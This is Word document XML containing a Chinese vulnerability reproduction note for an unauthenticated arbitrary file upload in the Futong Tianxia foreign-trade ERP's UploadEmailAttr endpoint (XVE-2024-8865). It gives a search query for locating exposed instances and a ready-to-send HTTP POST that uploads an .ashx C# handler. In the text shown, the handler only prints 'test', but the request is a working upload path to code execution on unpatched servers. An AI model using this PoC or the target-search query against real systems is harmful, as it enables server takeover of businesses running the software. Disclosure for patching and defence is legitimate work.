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8B4A7" w14:textId="7316A4A7" w:rsidR="00883E42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富通天下外贸ERP UploadEmailAttr 任意文件上传导致命令执行漏洞复现(XVE-2024-8865)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15274EB3" w14:textId="77777777" w:rsidR="00883E42" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="Njpec"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002EF50" w14:textId="77777777" w:rsidR="00883E42" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="uc3c3d49d"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>富通天下外贸ERP是一款专为外贸行业量身定制的企业资源计划（ERP）软件。它涵盖了采购、销售、库存管理、财务会计等多个方面，帮助企业实现高效的运营管理和业务流程优化。该软件还具备多语言、多币种、跨境电商等特性，适应了外贸行业跨国经营的需求。此外，富通天下外贸ERP还提供了数据分析、报表定制等功能，帮助企业进行决策分析和业务发展规划。总的来说，富通天下外贸ERP是帮助外贸企业提升管理效率、降低成本、提高竞争力的重要工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA39213" w14:textId="77777777" w:rsidR="00883E42" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="u9df08089"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>富通天下外贸ERP UploadEmailAttr接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27BDB7" w14:textId="77777777" w:rsidR="00883E42" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="YFQ4i"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A5F504" w14:textId="77777777" w:rsidR="00883E42" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="u7e342e48"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>步骤一：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用以下搜索语法获取测试资产并确定测试目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B564A2" w14:textId="77777777" w:rsidR="00883E42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5" w:name="Y0qbn"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>title="用户登录_富通天下外贸ERP"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E26DF3" w14:textId="77777777" w:rsidR="00883E42" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="u1c69c9ba"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>步骤二：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A0C79D" w14:textId="77777777" w:rsidR="00883E42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7" w:name="q9QPY"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Host: your-ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-urlencoded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>&lt;% @ webhandler language="C#" class="AverageHandler" %&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>using System;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>using System.Web;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>public class AverageHandler : IHttpHandler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>public bool IsReusable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>{ get { return true; } }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>public void ProcessRequest(HttpContext ctx)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>ctx.Response.Write("test");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</w:p>
    <w:p w14:paraId="3E3D12FE" w14:textId="7A085716" w:rsidR="00883E42" w:rsidRDefault="00000000" w:rsidP="004D3104">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="ua29937f7"/>
      <w:bookmarkStart w:id="9" w:name="uddf7ec03"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="480E734A" wp14:editId="6D69AFA1">
            <wp:extent cx="5638800" cy="2831465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14048657" name="图片 1404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dfAWw"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="u7199f5bf"/>
      <w:bookmarkStart w:id="12" w:name="ued4ca2d0"/>
      <w:bookmarkStart w:id="13" w:name="u2a5360ff"/>
      <w:bookmarkStart w:id="14" w:name="uc2d7f5f8"/>
      <w:bookmarkStart w:id="15" w:name="uffbdf2ba"/>
      <w:bookmarkStart w:id="16" w:name="u5dd0a1f7"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:sectPr w:rsidR="00883E42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883E42"/>
    <w:rsid w:val="004D3104"/>
    <w:rsid w:val="00883E42"/>
    <w:rsid w:val="00A8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440E"/>
  <w15:docId w15:val="{B7028C68-EDE2-40F7-BF87-A407575F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2024-06-27T15:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-27T15:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>